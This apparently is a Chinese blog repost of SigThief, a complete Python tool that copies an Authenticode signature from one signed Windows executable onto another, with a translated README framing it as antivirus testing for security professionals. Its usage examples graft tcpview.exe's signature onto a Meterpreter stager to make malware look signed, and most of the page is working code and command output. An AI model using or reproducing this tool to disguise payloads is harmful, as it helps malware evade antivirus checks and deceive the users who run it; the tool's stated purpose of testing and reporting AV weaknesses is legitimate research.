zoukankan      html  css  js  c++  java
  • Windows 签名伪造工具的使用,Python,签名

    #!/usr/bin/env python3
    # LICENSE: BSD-3
    # Copyright: Josh Pitts @midnite_runr
    
    import sys
    import struct
    import shutil
    import io
    from optparse import OptionParser
    
    
    def gather_file_info_win(binary):
            """
            Borrowed from BDF...
            I could just skip to certLOC... *shrug*
            """
            flItms = {}
            binary = open(binary, 'rb')
            binary.seek(int('3C', 16))
            flItms['buffer'] = 0
            flItms['JMPtoCodeAddress'] = 0
            flItms['dis_frm_pehdrs_sectble'] = 248
            flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
            # Start of COFF
            flItms['COFF_Start'] = flItms['pe_header_location'] + 4
            binary.seek(flItms['COFF_Start'])
            flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
            binary.seek(flItms['COFF_Start'] + 2, 0)
            flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
            flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
            binary.seek(flItms['COFF_Start'] + 16, 0)
            flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
            flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
            #End of COFF
            flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
    
            #if flItms['SizeOfOptionalHeader']:
                #Begin Standard Fields section of Optional Header
            binary.seek(flItms['OptionalHeader_start'])
            flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
            flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
            flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
            flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
            flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
            flItms['SizeOfUninitializedData'] = struct.unpack("<I",
                                                                   binary.read(4))[0]
            flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
            flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
            flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
            if flItms['Magic'] != 0x20B:
                flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
            # End Standard Fields section of Optional Header
            # Begin Windows-Specific Fields of Optional Header
            if flItms['Magic'] == 0x20B:
                flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
            else:
                flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
            flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
            flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
            flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
                                                                       binary.read(2))[0]
            flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
                                                                       binary.read(2))[0]
            flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
            flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
            flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
            flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
            flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
            flItms['SizeOfImageLoc'] = binary.tell()
            flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
            flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
            flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
            flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
            flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
            if flItms['Magic'] == 0x20B:
                flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
                flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
                flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
                flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
    
            else:
                flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
                flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
                flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
                flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
            flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
            flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
            # End Windows-Specific Fields of Optional Header
            # Begin Data Directories of Optional Header
            flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
            flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
            flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
            #ImportTable SIZE|LOC
            flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
            flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
            flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
            flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
            flItms['CertTableLOC'] = binary.tell()
            flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
            flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
            binary.close()
            return flItms
    
    
    def copyCert(exe):
        flItms = gather_file_info_win(exe)
    
        if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
            # not signed
            print("Input file Not signed!")
            sys.exit(-1)
    
        with open(exe, 'rb') as f:
            f.seek(flItms['CertLOC'], 0)
            cert = f.read(flItms['CertSize'])
        return cert
    
    
    def writeCert(cert, exe, output):
        flItms = gather_file_info_win(exe)
        
        if not output: 
            output = output = str(exe) + "_signed"
    
        shutil.copy2(exe, output)
        
        print("Output file: {0}".format(output))
    
        with open(exe, 'rb') as g:
            with open(output, 'wb') as f:
                f.write(g.read())
                f.seek(0)
                f.seek(flItms['CertTableLOC'], 0)
                f.write(struct.pack("<I", len(open(exe, 'rb').read())))
                f.write(struct.pack("<I", len(cert)))
                f.seek(0, io.SEEK_END)
                f.write(cert)
    
        print("Signature appended. 
    FIN.")
    
    
    def outputCert(exe, output):
        cert = copyCert(exe)
        if not output:
            output = str(exe) + "_sig"
    
        print("Output file: {0}".format(output))
    
        open(output, 'wb').write(cert)
    
        print("Signature ripped. 
    FIN.")
    
    
    def check_sig(exe):
        flItms = gather_file_info_win(exe)
     
        if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
            # not signed
            print("Inputfile Not signed!")
        else:
            print("Inputfile is signed!")
    
    
    def truncate(exe, output):
        flItms = gather_file_info_win(exe)
     
        if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
            # not signed
            print("Inputfile Not signed!")
            sys.exit(-1)
        else:
            print( "Inputfile is signed!")
    
        if not output:
            output = str(exe) + "_nosig"
    
        print("Output file: {0}".format(output))
    
        shutil.copy2(exe, output)
    
        with open(output, "r+b") as binary:
            print('Overwriting certificate table pointer and truncating binary')
            binary.seek(-flItms['CertSize'], io.SEEK_END)
            binary.truncate()
            binary.seek(flItms['CertTableLOC'], 0)
            binary.write(b"x00x00x00x00x00x00x00x00")
    
        print("Signature removed. 
    FIN.")
    
    
    def signfile(exe, sigfile, output):
        flItms = gather_file_info_win(exe)
        
        cert = open(sigfile, 'rb').read()
    
        if not output: 
            output = output = str(exe) + "_signed"
    
        shutil.copy2(exe, output)
        
        print("Output file: {0}".format(output))
        
        with open(exe, 'rb') as g:
            with open(output, 'wb') as f:
                f.write(g.read())
                f.seek(0)
                f.seek(flItms['CertTableLOC'], 0)
                f.write(struct.pack("<I", len(open(exe, 'rb').read())))
                f.write(struct.pack("<I", len(cert)))
                f.seek(0, io.SEEK_END)
                f.write(cert)
        print("Signature appended. 
    FIN.")
    
    
    if __name__ == "__main__":
        usage = 'usage: %prog [options]'
        parser = OptionParser()
        parser.add_option("-i", "--file", dest="inputfile", 
                      help="input file", metavar="FILE")
        parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
                      help='rip signature off inputfile')
        parser.add_option('-a', '--add', dest='addsig', action='store_true',
                      help='add signautre to targetfile')
        parser.add_option('-o', '--output', dest='outputfile',
                      help='output file')
        parser.add_option('-s', '--sig', dest='sigfile',
                      help='binary signature from disk')
        parser.add_option('-t', '--target', dest='targetfile',
                      help='file to append signature to')
        parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
                      help='file to check if signed; does not verify signature')
        parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
                      help='truncate signature (i.e. remove sig)')
        (options, args) = parser.parse_args()
        
        # rip signature
        # inputfile and rip to outputfile
        if options.inputfile and options.ripsig:
            print("Ripping signature to file!")
            outputCert(options.inputfile, options.outputfile)
            sys.exit()    
    
        # copy from one to another
        # inputfile and rip to targetfile to outputfile    
        if options.inputfile and options.targetfile:
            cert = copyCert(options.inputfile)
            writeCert(cert, options.targetfile, options.outputfile)
            sys.exit()
    
        # check signature
        # inputfile 
        if options.inputfile and options.checksig:
            check_sig(options.inputfile) 
            sys.exit()
    
        # add sig to target file
        if options.targetfile and options.sigfile:
            signfile(options.targetfile, options.sigfile, options.outputfile)
            sys.exit()
            
        # truncate
        if options.inputfile and options.truncate:
            truncate(options.inputfile, options.outputfile)
            sys.exit()
    
        parser.print_help()
        parser.error("You must do something!")
    View Code

    仅限安全专业人员......

    这是什么?

    多年来,我注意到在针对反病毒软件的测试中,每个都是不同的,并且每个PE签名的优先级不同,无论签名是否有效。有些反病毒软件供应商优先考虑某些证书颁发机构而不检查签名是否真正有效,并且有一些只是检查以查看certTable是否填充了某些值。一团糟。

    所以我发布这个工具让你快速进行测试,并随时向供应商报告。

    简而言之,它将从已签名的PE文件中删除签名并将其附加到另一个文件,修复证书表以对文件进行签名。

    当然,这不是一个有效值的签名,这就是重点!

    我期待听到您的结果!

    如何使用 ?

    用法

    Usage: sigthief.py [options]
    
    Options:
      -h, --help            show this help message and exit
      -i FILE, --file=FILE  input file
      -r, --rip             rip signature off inputfile
      -a, --add             add signautre to targetfile
      -o OUTPUTFILE, --output=OUTPUTFILE
                            output file
      -s SIGFILE, --sig=SIGFILE
                            binary signature from disk
      -t TARGETFILE, --target=TARGETFILE
                            file to append signature too
      -c, --checksig        file to check if signed; does not verify signature
      -T, --truncate        truncate signature (i.e. remove sig)
    

    从二进制文件中获取签名并将其添加到另一个二进制文件中

    $ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
    Output file: /tmp/msftesting_tcpview.exe
    Signature appended. 
    FIN.
    

    将签名保存到磁盘以供以后使用

    $ ./sigthief.py -i tcpview.exe -r                                                        
    Ripping signature to file!
    Output file: tcpview.exe_sig
    Signature ripped. 
    FIN.
    
    

    使用翻录签名

    $ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
    Output file: x86_meterpreter_stager.exe_signed
    Signature appended. 
    FIN.
    
    

    截断(删除)签名

    这实际上有非常有趣的结果,可以帮助您找到重视代码功能签名的AV。Unsign putty.exe;)

    $ ./sigthief.py -i tcpview.exe -T    
    Inputfile is signed!
    Output file: tcpview.exe_nosig
    Overwriting certificate table pointer and truncating binary
    Signature removed. 
    FIN.
    

    检查是否有签名(不检查有效性)

    $ ./sigthief.py -i tcpview.exe -c
    Inputfile is signed!
    git clone https://github.com/secretsquirrel/SigThief
  • 相关阅读:
    spark 读取mongodb失败,报executor time out 和GC overhead limit exceeded 异常
    在zepplin 使用spark sql 查询mongodb的数据
    Unable to query from Mongodb from Zeppelin using spark
    spark 与zepplin 版本兼容
    kafka 新旧消费者的区别
    kafka 新生产者发送消息流程
    spark ui acl 不生效的问题分析
    python中if __name__ == '__main__': 的解析
    深入C++的new
    NSSplitView
  • 原文地址:https://www.cnblogs.com/csnd/p/11521196.html
Copyright © 2011-2022 走看看